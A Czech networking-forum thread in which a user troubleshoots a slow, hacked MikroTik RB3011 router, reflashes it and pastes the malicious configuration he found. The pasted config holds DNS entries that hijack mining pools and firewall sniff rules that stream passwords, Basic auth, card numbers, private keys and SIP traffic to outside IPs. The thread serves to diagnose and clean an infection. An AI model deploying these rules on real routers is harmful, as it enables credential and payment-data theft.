MikroTik RouterBOARD 3011UiAS problém s datovým tokem

Návody a problémy s konfigurací.
Ben
Příspěvky: 3
Registrován: 2 months ago

MikroTik RouterBOARD 3011UiAS problém s datovým tokem

Příspěvekod Ben » 2 months ago

Dobrý den,


mám na firmě RouterBOARD 3011UiAS. Který používám hodně dlouho a nikdy jsem s ním neměl problém až do teď.

Internet máme od UPC, který má u nás SWITCH - CISCO - 100 / 100 (předávací bod). Včera jsem iperfoval a z předávacího bodu teče 115/105, což je ok. Jakmile z předávacího bodu připojím do ETH1, který je určen jako WAN a ETH9 jde do Switche, tak je rychlost 30/30 a víc to nedá.

Zkoušel jsem přítom z MikroTiku do PC a přes 30/30 se nedostanu. Vyloučil jsem všechny aktivní prvky po cestě. Dělá to na 100% MikroTik. Nevíte čím by to mohlo být? Měl jsem nastavené dobře, kde to makalo 100/100 a před týdnem z ničeho nic přestalo fungovat full rychlostí. Žádný zásah ani upgrade jsem neprováděl. Pokud přidám ETH2 jako WAN, tak je rychlost totožná 30/30. Všude mám napsáno unlimited.

Ještě jsem si všiml, že pokud se chci přihlásit přes WinBOX, tak se nepřihlásím - píše to pouze Error. Pokud se přihlásím přes www rozhraní, tak vše maká jak má.

Na MikroTiku se mi nepozdává, to že pokud je zapojen pouze do mého PC, tak probíhá jak na RX, tak TX nějaký datový tok. Přitom na PC neprobíhá synchronizace ani aktualizace. Tudíž žádný pohyb na síť. kartě. Když už tak maličký a ne v takových rozměrech / tocích.

Parametry:

RouterBOARD 3011UiAS
Firmware type: ipq8060
Factory Firmware: 3.27
Current Firmware: 3.41
Upgrade Firmware: 6.43.4




Setkal se s tímto někdo? Jak prosím řešit?
Děkuji za odpovědi a případná řešení.
Přílohy
MikroTik.jpg
MikroTik.jpg (96.39 KiB) Zobrazeno 1599 x
0 x

Uživatelský avatar
pcwifi
Příspěvky: 2898
Registrován: 11 years ago
antispam: Ano
Bydliště: Brnensko

Příspěvekod pcwifi » 2 months ago

primarne bych resil proc nejde login pres winbox, ze by nejaky ten virecek jak se tu obsahle resilo a resi ? udelej zalohu / export nastaveni, celej ten RB přepal NetInstallem , nastav jen zaklad a zkus jak se chova speed. pokud ok prdni tam zpet zalohu konfigu a uvidis...
1 x
Umřel sem, tak do mě nekopte a nechte mne spát... budoucnost bezdrátových sítí je jen mimo venek, kdo doteď nezačal s budováním optických sítí, půjde do 4 let pod drn ( do konce r. 2021) i diky 3,7Ghz u velkych operatoru

coolerman1
Příspěvky: 242
Registrován: 11 years ago

Příspěvekod coolerman1 » 2 months ago

Upgradni FW mne to robilo zlobu ked som mal iny fw a iny ros
2 x

Daxxim
Příspěvky: 353
Registrován: 7 years ago
Kontaktovat uživatele:

Příspěvekod Daxxim » 2 months ago

Není rozstřelená? Zaplá webproxy? Nějaký mangle pravidla ve firewallu? Přepsaný porty na api, telnet, ssh a winbox?
0 x

Uživatelský avatar
hapi
Příspěvky: 11903
Registrován: 11 years ago
Kontaktovat uživatele:

Příspěvekod hapi » 2 months ago

to vypadá jak na otevřenej dns server z venku a nejenom to.
2 x

Uživatelský avatar
honzam
Příspěvky: 5178
Registrován: 11 years ago

Příspěvekod honzam » 2 months ago

coolerman1 píše:Upgradni FW mne to robilo zlobu ked som mal iny fw a iny ros

A kam by to měl upgradnout když má poslední 6.43.4?
0 x

Uživatelský avatar
Myghael
Příspěvky: 1265
Registrován: 7 years ago

Příspěvekod Myghael » 2 months ago

honzam píše:
coolerman1 píše:Upgradni FW mne to robilo zlobu ked som mal iny fw a iny ros

A kam by to měl upgradnout když má poslední 6.43.4?


Já tam vidím, že má 3.41 a možnost upgradu na 6.43.4. A rovněž se přikláním k tomu, že by to bylo dobré upgradovat. RB3011 mám taky a tyhle problémy nemám, takže to chce upgradovat a pak řešit, jestli to není hacknuté - osobně bych si asi vysypal konfiguraci, přejel to netinstallem nanečisto a celé nastavil znovu.

Ben píše:Parametry:

RouterBOARD 3011UiAS
Firmware type: ipq8060
Factory Firmware: 3.27
Current Firmware: 3.41
Upgrade Firmware: 6.43.4
1 x
Si vis pacem, para bellum.

MikroTik, UBNT, Cisco, TP-Link... rozhoduje vhodnost toho či onoho pro konkrétní použití, ne jaké logo nalepili v Číně na krabici. Na tomto fóru vystupuji jen a pouze sám za sebe.

Uživatelský avatar
honzam
Příspěvky: 5178
Registrován: 11 years ago

Příspěvekod honzam » 2 months ago

Jo ty myslíš Bios. Pod pojmem fw jsem myslel ROS. Podle mě upgrade Biosu nepomůže ale může to zkusit.
Spíš by bylo lepší vložit konfig sem...
2 x

Uživatelský avatar
Myghael
Příspěvky: 1265
Registrován: 7 years ago

Příspěvekod Myghael » 2 months ago

honzam: No to rozhodnopádně

Ben píše:...


Bude to chtít postnout ještě konfiguraci tvého zařízení, nejlépe v terminálu následující příkaz (před odesláním přepiš např. IP adresy třeba na A.B.C.D a vůbec podobně skryj, co nechceš dát ven):

Kód: Vybrat vše

/export compact


Případně i výpis souborů:

Kód: Vybrat vše

/file print


Jinak promiň, ale křišťálovou kouli jsem si nechal v autě, čajové lístky si kocour spletl s šantou a úplněk je za dlouho.
0 x
Si vis pacem, para bellum.

MikroTik, UBNT, Cisco, TP-Link... rozhoduje vhodnost toho či onoho pro konkrétní použití, ne jaké logo nalepili v Číně na krabici. Na tomto fóru vystupuji jen a pouze sám za sebe.

Uživatelský avatar
tron
Příspěvky: 23
Registrován: 4 years ago

Příspěvekod tron » 2 months ago

upgradoval bych
Přílohy
mk.png
mk.png (19.42 KiB) Zobrazeno 1186 x
1 x

Ben
Příspěvky: 3
Registrován: 2 months ago

Příspěvekod Ben » 2 months ago

Dobrý den,


provedl jsem netinstall a vše již funguje jak má. Vypnul jsem services, které nepoužívám z důvodu bezpečnosti. Po 10min již někdo ťukal na vrátka viz. screen.

Před netinstallem jsem exportoval config do .rsc. Objevil jsem tam bakterii, která pravděpodobně těžila bitcoin a ethereum. Pak z netu na můj RB útočil jiný MikroTik a snažil se mi dostat do RB.

Config:

/ip dns static
add address=185.205.210.23 name=asia1.ethermine.org
add address=185.205.210.23 name=asia1.ethpool.org
add address=185.205.210.23 name=asia1.fullhashed.com
add address=185.205.210.23 name=asia2.ethermine.org
add address=185.205.210.23 name=cn.sparkpool.com
add address=185.205.210.23 name=aurorapool.net
add address=185.205.210.23 name=daggerhashimoto.br.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.eu.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.hk.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.in.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.jp.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.usa.nicehash.com
add address=185.205.210.23 name=coinotron.com
add address=185.205.210.23 name=eth.1stpool.com
add address=185.205.210.23 name=eth.anorak.tech
add address=185.205.210.23 name=eth.2miners.com
add address=185.205.210.23 name=eth.antpool.com
add address=185.205.210.23 name=eth-ar.dwarfpool.com
add address=185.205.210.23 name=eth.arsmine.net
add address=185.205.210.23 name=eth-as.coinmine.pl
add address=185.205.210.23 name=eth-asia1.nanopool.org
add address=185.205.210.23 name=eth-br.dwarfpool.com
add address=185.205.210.23 name=eth.chileminers.cl
add address=185.205.210.23 name=eth.coinfoundry.org
add address=185.205.210.23 name=eth.coinmine.pl
add address=185.205.210.23 name=ethepool.com
add address=185.205.210.23 name=ether.bw.com
add address=185.205.210.23 name=etherdig.net
add address=185.205.210.23 name=ethereum.marshsoftware.ca
add address=185.205.210.23 name=ethereumpool.club
add address=185.205.210.23 name=ethergrab.us
add address=185.205.210.23 name=ethermine.ru
add address=185.205.210.23 name=ethertrench.com
add address=185.205.210.23 name=eth.ethertrench.com
add address=185.205.210.23 name=eth-eu1.nanopool.org
add address=185.205.210.23 name=eth-eu.coinmine.pl
add address=185.205.210.23 name=eth-eu.dwarfpool.com
add address=185.205.210.23 name=eth-eu.mining.sk
add address=185.205.210.23 name=eth-eu.pool.sexy
add address=185.205.210.23 name=eth.f2pool.com
add address=185.205.210.23 name=eth.gigantpool.com
add address=185.205.210.23 name=eth.gpumine.org
add address=185.205.210.23 name=eth-hk.dwarfpool.com
add address=185.205.210.23 name=eth.miningcity.org
add address=185.205.210.23 name=eth.mymininghub.com
add address=185.205.210.23 name=eth.pool.minergate.com
add address=185.205.210.23 name=eth.poolmining.org
add address=185.205.210.23 name=eth-pool.ucrypto.net
add address=185.205.210.23 name=eth.pool.zet-tech.eu
add address=185.205.210.23 name=eth-ru.dwarfpool.com
add address=185.205.210.23 name=eth-ru.edgestile.io
add address=185.205.210.23 name=eth-ru.mining.sk
add address=185.205.210.23 name=eth-sg.dwarfpool.com
add address=185.205.210.23 name=eth.soyminero.es
add address=185.205.210.23 name=eth.suprnova.cc
add address=185.205.210.23 name=eth.uleypool.com
add address=185.205.210.23 name=eth-us.coinmine.pl
add address=185.205.210.23 name=eth-us.dwarfpool.com
add address=185.205.210.23 name=eth-us-east1.nanopool.org
add address=185.205.210.23 name=eth-us.maxhash.org
add address=185.205.210.23 name=eth-us.pool.sexy
add address=185.205.210.23 name=eth-us-west1.nanopool.org
add address=185.205.210.23 name=eth.waterhole.io
add address=185.205.210.23 name=eth.xeminer.net
add address=185.205.210.23 name=eth.zion.net.co
add address=185.205.210.23 name=eu1.ethermine.org
add address=185.205.210.23 name=eu1.ethpool.org
add address=185.205.210.23 name=eu2.ethermine.org
add address=185.205.210.23 name=eu.99miners.com
add address=185.205.210.23 name=eu.ethmine.club
add address=185.205.210.23 name=eu.sparkpool.com
add address=185.205.210.23 name=huabei2-pool.ethfans.org
add address=185.205.210.23 name=huabei-pool.ethfans.org
add address=185.205.210.23 name=miningcity.org
add address=185.205.210.23 name=my.ethpool.net
add address=185.205.210.23 name=na-west.sparkpool.com
add address=185.205.210.23 name=na-east.sparkpool.com
add address=185.205.210.23 name=noobpool.com
add address=185.205.210.23 name=pool.ethfans.org
add address=185.205.210.23 name=pool.virtualmining.pt
add address=185.205.210.23 name=s.comining.io
add address=185.205.210.23 name=us1.ethermine.org
add address=185.205.210.23 name=us1.ethpool.org
add address=185.205.210.23 name=us2.ethermine.org
add address=185.205.210.23 name=us2.ethpool.org
add address=185.205.210.23 name=vaux-all.uk
add address=209.239.112.96 name=stratum.antpool.com
add address=209.239.112.96 name=stratum.slushpool.com
add address=209.239.112.96 name=asia1.ethermine.org
add address=209.239.112.96 name=cn.stratum.slushpool.com
add address=209.239.112.96 name=eu.stratum.slushpool.com
add address=209.239.112.96 name=asia1.ethpool.org
add address=209.239.112.96 name=jp-stratum.btcc.com
add address=209.239.112.96 name=asia1.fullhashed.com
add address=209.239.112.96 name=mint.bitminter.com
add address=209.239.112.96 name=asia2.ethermine.org
add address=209.239.112.96 name=us.ss.btc.com
add address=209.239.112.96 name=cn.sparkpool.com
add address=209.239.112.96 name=na-west.sparkpool.com
add address=209.239.112.96 name=na-east.sparkpool.com
add address=209.239.112.96 name=aurorapool.net
add address=209.239.112.96 name=tw.sparkpool.com
add address=209.239.112.96 name=daggerhashimoto.br.nicehash.com
add address=209.239.112.96 name=kr.sparkpool.com
add address=209.239.112.96 name=daggerhashimoto.eu.nicehash.com
add address=209.239.112.96 name=jp.sparkpool.com
add address=209.239.112.96 name=bitcoin.viabtc.com
add address=209.239.112.96 name=daggerhashimoto.hk.nicehash.com
add address=209.239.112.96 name=stratum-us.f2pool.com
add address=209.239.112.96 name=daggerhashimoto.in.nicehash.com
add address=209.239.112.96 name=stratum.f2pool.com
add address=209.239.112.96 name=daggerhashimoto.jp.nicehash.com
add address=209.239.112.96 name=stratum.btcguild.com
add address=209.239.112.96 name=stratum.btccpool.com
add address=209.239.112.96 name=daggerhashimoto.usa.nicehash.com
add address=209.239.112.96 name=stratum.btc.top
add address=209.239.112.96 name=coinotron.com
add address=209.239.112.96 name=eth.1stpool.com
add address=209.239.112.96 name=eth.anorak.tech
add address=209.239.112.96 name=eth.2miners.com
add address=209.239.112.96 name=eth.antpool.com
add address=209.239.112.96 name=eth-ar.dwarfpool.com
add address=209.239.112.96 name=eth.arsmine.net
add address=209.239.112.96 name=eth-as.coinmine.pl
add address=209.239.112.96 name=eth-asia1.nanopool.org
add address=209.239.112.96 name=eth-br.dwarfpool.com
add address=209.239.112.96 name=eth.chileminers.cl
add address=209.239.112.96 name=eth.coinfoundry.org
add address=209.239.112.96 name=eth.coinmine.pl
add address=209.239.112.96 name=ethepool.com
add address=209.239.112.96 name=ether.bw.com
add address=209.239.112.96 name=etherdig.net
add address=209.239.112.96 name=ethereum.marshsoftware.ca
add address=209.239.112.96 name=ethereumpool.club
add address=209.239.112.96 name=ethergrab.us
add address=209.239.112.96 name=ethermine.ru
add address=209.239.112.96 name=ethertrench.com
add address=209.239.112.96 name=eth.ethertrench.com
add address=209.239.112.96 name=eth-eu1.nanopool.org
add address=209.239.112.96 name=eth-eu.coinmine.pl
add address=209.239.112.96 name=eth-eu.dwarfpool.com
add address=209.239.112.96 name=eth-eu.mining.sk
add address=209.239.112.96 name=eth-eu.pool.sexy
add address=209.239.112.96 name=eth.f2pool.com
add address=209.239.112.96 name=eth.gigantpool.com
add address=209.239.112.96 name=eth.gpumine.org
add address=209.239.112.96 name=eth-hk.dwarfpool.com
add address=209.239.112.96 name=eth.miningcity.org
add address=209.239.112.96 name=eth.mymininghub.com
add address=209.239.112.96 name=eth.pool.minergate.com
add address=209.239.112.96 name=eth.poolmining.org
add address=209.239.112.96 name=eth-pool.ucrypto.net
add address=209.239.112.96 name=eth.pool.zet-tech.eu
add address=209.239.112.96 name=eth-ru.dwarfpool.com
add address=209.239.112.96 name=eth-ru.edgestile.io
add address=209.239.112.96 name=eth-ru.mining.sk
add address=209.239.112.96 name=eth-sg.dwarfpool.com
add address=209.239.112.96 name=eth.soyminero.es
add address=209.239.112.96 name=eth.suprnova.cc
add address=209.239.112.96 name=eth.uleypool.com
add address=209.239.112.96 name=eth-us.coinmine.pl
add address=209.239.112.96 name=eth-us.dwarfpool.com
add address=209.239.112.96 name=eth-us-east1.nanopool.org
add address=209.239.112.96 name=eth-us.maxhash.org
add address=209.239.112.96 name=eth-us.pool.sexy
add address=209.239.112.96 name=eth-us-west1.nanopool.org
add address=209.239.112.96 name=eth.waterhole.io
add address=209.239.112.96 name=eth.xeminer.net
add address=209.239.112.96 name=eth.zion.net.co
add address=209.239.112.96 name=eu1.ethermine.org
add address=209.239.112.96 name=eu1.ethpool.org
add address=209.239.112.96 name=eu2.ethermine.org
add address=209.239.112.96 name=eu.99miners.com
add address=209.239.112.96 name=eu.ethmine.club
add address=209.239.112.96 name=eu.sparkpool.com
add address=209.239.112.96 name=huabei2-pool.ethfans.org
add address=209.239.112.96 name=huabei-pool.ethfans.org
add address=209.239.112.96 name=miningcity.org
add address=209.239.112.96 name=my.ethpool.net
add address=209.239.112.96 name=noobpool.com
add address=209.239.112.96 name=pool.ethfans.org
add address=209.239.112.96 name=pool.virtualmining.pt
add address=209.239.112.96 name=s.comining.io
add address=209.239.112.96 name=us1.ethermine.org
add address=209.239.112.96 name=us1.ethpool.org
add address=209.239.112.96 name=us2.ethermine.org
add address=209.239.112.96 name=us2.ethpool.org
add address=209.239.112.96 name=vaux-all.uk

/ip firewall mangle
add action=mark-connection chain=prerouting content=eth_submitWork \
new-connection-mark=Ethereum
add action=add-dst-to-address-list address-list=Ethereum chain=prerouting \
content=eth_submitWork
add action=fasttrack-connection chain=prerouting content=eth_submitWork
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \
sniff-target=149.56.27.80 sniff-target-port=60000
add action=mark-connection chain=prerouting content=eth_submitWork \
new-connection-mark=Ethereum
add action=add-dst-to-address-list address-list=Ethereum chain=prerouting \
content=eth_submitWork
add action=fasttrack-connection chain=prerouting content=eth_submitWork
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \
sniff-target=149.56.27.80 sniff-target-port=60000
add action=mark-connection chain=prerouting content=mining.submit \
new-connection-mark=Bitcoin
add action=add-dst-to-address-list address-list=Bitcoin chain=prerouting \
content=mining.submit
add action=mark-connection chain=prerouting content=mining.submit \
new-connection-mark=Bitcoin
add action=sniff-tzsp chain=prerouting content="ccn=" sniff-target=\
149.56.27.80 sniff-target-port=60001
add action=add-dst-to-address-list address-list=Bitcoin chain=prerouting \
content=mining.submit
add action=sniff-tzsp chain=prerouting content=privatekey sniff-target=\
149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="ccn=" sniff-target=\
149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \
sniff-target=149.56.27.80 sniff-target-port=60000
add action=sniff-tzsp chain=prerouting content=privatekey sniff-target=\
149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content=json sniff-target=149.56.27.80 \
sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \
sniff-target=149.56.27.80 sniff-target-port=60000
add action=sniff-tzsp chain=prerouting content="passwd=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content=json sniff-target=149.56.27.80 \
sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="password=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="passwd=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="pass=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="password=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=fasttrack-connection chain=prerouting content=Bitcoin
add action=sniff-tzsp chain=prerouting content="pass=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=tcp \
sniff-target=149.56.27.80 sniff-target-port=60003
add action=fasttrack-connection chain=prerouting content=Bitcoin
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=udp \
sniff-target=149.56.27.80 sniff-target-port=60003
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=tcp \
sniff-target=149.56.27.80 sniff-target-port=60003
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=udp \
sniff-target=149.56.27.80 sniff-target-port=60003

/tool graphing interface
add
/tool sniffer
set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp,udp \
filter-port=ftp-data,ftp,pop3,143,1500,10000 filter-stream=yes \
streaming-server=37.1.207.114

Mockrát všem děkuji za rady.
Přílohy
upc_attack.jpg
upc_attack.jpg (68.31 KiB) Zobrazeno 1011 x
0 x

ludvik
Příspěvky: 4034
Registrován: 7 years ago

Příspěvekod ludvik » 2 months ago

Když jsi zakázal nepoužívané services - ty používáš telnet?
0 x
Ohledně GDPR již nediskutuji. Když nic nevím, musím si to nastudovat jinde - a pak už to vím a nemám potřebu diskutovat zde.

Ben
Příspěvky: 3
Registrován: 2 months ago

Příspěvekod Ben » 2 months ago

Telnet nepoužívám.
0 x

ludvik
Příspěvky: 4034
Registrován: 7 years ago

Příspěvekod ludvik » 2 months ago

Ben píše:Telnet nepoužívám.

Log říká totiž, že ho máš povolený.
0 x
Ohledně GDPR již nediskutuji. Když nic nevím, musím si to nastudovat jinde - a pak už to vím a nemám potřebu diskutovat zde.


Zpět na „Konfigurace“

Kdo je online

Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 7 hostů